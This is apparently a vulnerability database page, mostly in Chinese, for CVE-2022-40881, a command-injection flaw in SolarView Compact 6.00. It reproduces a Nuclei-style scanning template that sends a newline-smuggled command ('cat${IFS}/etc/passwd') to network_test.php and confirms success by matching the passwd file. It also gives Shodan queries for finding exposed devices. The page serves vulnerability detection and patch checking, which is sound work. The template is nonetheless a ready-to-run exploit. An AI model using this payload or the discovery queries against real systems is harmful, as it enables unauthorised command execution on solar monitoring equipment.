CVE-2022-40881: SolarView 6.00 - Remote Command Execution

日期: 2025-08-01 | 影响软件: SolarView | POC: 已公开

漏洞描述

SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.

PoC代码[已公开]

id: CVE-2022-40881

info:
  name: SolarView 6.00 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
  reference:
    - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
    - https://github.com/advisories/GHSA-wx3r-88rg-whxq
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40881
    cwe-id: CWE-77
    epss-score: 0.93672
    epss-percentile: 0.99835
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.favicon.hash:"-244067125"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln
variables:
  cmd: "cat${IFS}/etc/passwd"

http:
  - raw:
      - |
        POST /network_test.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        host=%0a{{cmd}}%0a&command=ping

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cd6daef16ec7c0b8715dd140c2f96cff6cfebb9fd558d5a9fd09baeed36981750220196b46bcb1e85008d3db350cc673b57b04e5ff17e826ae999fe36cad9fc5b97a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐